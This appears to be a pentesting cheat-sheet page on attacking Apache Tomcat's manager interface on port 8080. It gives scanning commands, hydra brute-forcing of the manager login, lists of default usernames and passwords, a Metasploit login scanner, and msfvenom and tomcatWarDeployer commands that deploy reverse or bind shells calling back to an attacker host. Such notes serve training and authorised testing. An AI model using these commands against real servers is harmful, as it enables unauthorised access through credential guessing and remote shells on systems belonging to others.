Tomcat 8080

#Default port 8080 Check out default directories /manager /manager.html #Default creds list https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown

#Run nikto nikto -h http://10.10.10.10:8080 #Reverse shell to upload sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.101.112 LPORT=1234 -f war -o shelly.war #Hydra hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.10 http-get /manager/html #tomcatWarDeployer.py sudo git-clone https://github.com/mgeeky/tomcatWarDeployer.git Revshell:

./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/ Bind shell:

./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/

#Users.txt

admin
both 
manager 
role1 
role 
root 
tomcat

#Default_passwords.txt

manager
role1
password
password1
r00t
root
toor
tomcat
s3cret
password1
password
admin
changethis

#Metasploit Scanner | good for quick username enumeration/bruteforcing

 use auxiliary/scanner/http/tomcat_mgr_login

PreviousUnreal IRC 6667 NextMongoDB 27017

Last updated 2 years ago